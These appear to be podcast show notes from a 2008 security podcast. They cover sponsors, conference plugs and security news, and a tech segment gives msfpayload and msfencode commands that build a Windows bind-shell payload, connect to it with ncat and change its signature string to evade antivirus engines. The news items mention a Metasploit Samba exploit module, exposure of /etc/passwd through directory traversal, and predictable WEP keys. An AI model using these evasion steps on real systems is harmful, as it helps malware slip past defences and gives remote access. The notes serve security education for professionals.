Register for PaulDotCom training at Blackhat USA: Defensive Countermeasures: Foundations for Becoming a Devious Defender & Offensive Countermeasures: The Art Of Active Defense July 27-28 & 29-30.
This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.
This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!
Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.
One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.
Announcements & Shameless Plugs
Live from SANS NS 2008 in Las Vegas! Welcome to PaulDotCom Security Weekly, Episode 125 for September 30th, 2008
Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.
- PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
- ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have Team names: The Steadfast Buccaneers and the The Network Ninja Assassins!
- ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)
Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way
Pass #1 - Metasploit 3.1-release Payload - Unmodified
msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe
The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:
funnyhostname:~ pdc$ ncat 192.168.169.40 6453 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>
The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:
"Reverse Engineering The Payload"
bash-3.2# strings payload.exe !This program cannot be run in DOS mode. .text .rdata @.data .bss .idata Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_bind_tcp Length: 317 Options: LPORT=6453
Pass #2 - Metasploit Payload - Changed Version String
Editing msfpayload to change the version string:
if (cmd =~ /^x/) note = "PaulDotCom's Evil Payload\n" + "Payload: " + payload.refname + "\n" + " Length: " + buf.length.to_s + "\n" + "Options: " + options + "\n"
The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).
Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai
msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe
The payload generated above when uploaded to Virus Total only gets detected by 4 out of 36 anti-virus engines. However, it does not function in my testing, but does show how we can evade anti-virus systems.
Tech Segment: Simcard Forensics, an adventure in information gathering
Here's a link to the FLASH (swf) presentation so you can follow along.
Stories Of Interest
Faking passports the THC way - [PauldotCom] - Talk about identity theft! Why do governments not learn that RFID is not secure? Its wireless all over again, transmitting in the clear and using poor encryption. The defense here, get an RF shielding wallet and/or case to keep your RF enabled stuff in. Like, your credit card... [Larry] - vonJeek modified RFIDiot to clone e-passports to a 72 K smart card with incorrect information. It works because the sanity checking is apparently broken because it is based on a self signed cert that is never appropriately validated.
Don't forget to wipe... - [Larry] - More reasons why we are giving away DBAN. Be careful wen you decommission equipment and send them to e-Bay or a reseller. In this example a camera owned by MI6 was bought on e-Bay, and the camera still contained pictures if missiles, authentication info and photos of classified Al-Queda documentation. On a related note this one is even scarier - buy a hardware VPN endpoint on e-Bay, connect it up, and it automatically connects up to the internal network of Kirklees Council in Yorkshire. This makes bypassing the crunchy outside of your network trivial for an attacker. Set all equipment back to factory defaults!
Linksys WRT350N unauthorized access - [PaulDotCom] - So, this is perhaps one of the lamest vuln write-ups, but lets go through it anyway:
- Router contains and "Outdated Samba 3.0.2, vulnerable to numerous security holes." Okay, well, that sucks (See metasploit for associated exploit, msf > use linux/samba/lsa_transnames_heap). Supposedly, there is no way to disable the samba server.
- "Default admin:admin user" - This is the default on most routers, I beg and plead with vendors to allow the user to set the initial password, but it falls on deaf ears.
- "Default open guest user, noway to disable it" - Hrm, I wonder two things, 1) what privs does the guest user get? 2) Why can't it be disabled!
Chrome not making inroads - [Larry] - For good reason, mostly because most business apps only work with IE. But given the number of issues that we are seeing with Chrome for either DoS or remote exploitation, I'm personally happy to not see it being used widely.
HP Insight Diag remote exploit - [PaulDotCom] - I hate vuln write-ups that provide no information. This one in particular is scary, because where is InSight typically installed? On all your servers! So in one fell swoop I can pwn your server farm, and until you find a patch, there is no information for you to implement a workaround. Because you know, when a patch comes out for all of your servers, you don't take time to test it, you just blast it out, right? :) [Larry] - Not a lot of detail here, except that a "potential security vulnerability has been identified with HP Insight Diagnostics . The vulnerability could be remotely exploited to gain unauthorized access to files." In fact the referenced CVE has even less info!
Verizon FIOS Actiontec router predictable WEP Key - [Larry] - Sounds mile some of the stuff GNUCITIZEN talked about with the BT home hub - except there is no fancy math stuff involved. The WEP key is the same as the last 40 bits of the ethernet MAC. How to get the ethernet mac? Kismet will report it in the connected clients listing after discovery. No cracking needed. (Hmm, I'm getting FIOS next friday....)
Indirect iPhone forensics - [PaulDotCom] - I filed this in the category of "Neat!". In the backup files for your iPhone, you can extract the text messages. Sometimes you can find good stuff in text messages, like passwords and phone numbers, and this method is way better than trying to sniff them off the wire, which is illegal.
Selling identities on the internet? - [Larry] - These folks will report to you if they detect that your info is being traded in the underground forums. i find this hard to believe that it will be effective, as it reminds me that the service is only as good as how much of the underground they infiltrate - much like a signature based AV or IDS.
Rooting Phillips - [PaulDotCom] - While it doesn't give you access to /etc/shadow, here is a vulnerability in a web application that gives anyone on the internet access to /etc/passwd on the web server. This is totally awesome! Oh wait, we really should give the company a chance (and the vendor) to patch it first, right? [Larry] - Wow, stupid configuration issues, allow directory traversal attacks on a Phillips website. Many more files are accessible.
Audience giveaway questions
- Signed copy of WRT54G Ultimate Hacking - Where was the first episode of PaulDotCom Security weekly recorded (be specific - conference, location, building, room)
- The mystery prize
- Lightsaber - Name 4 security industry guests (not co-hosts)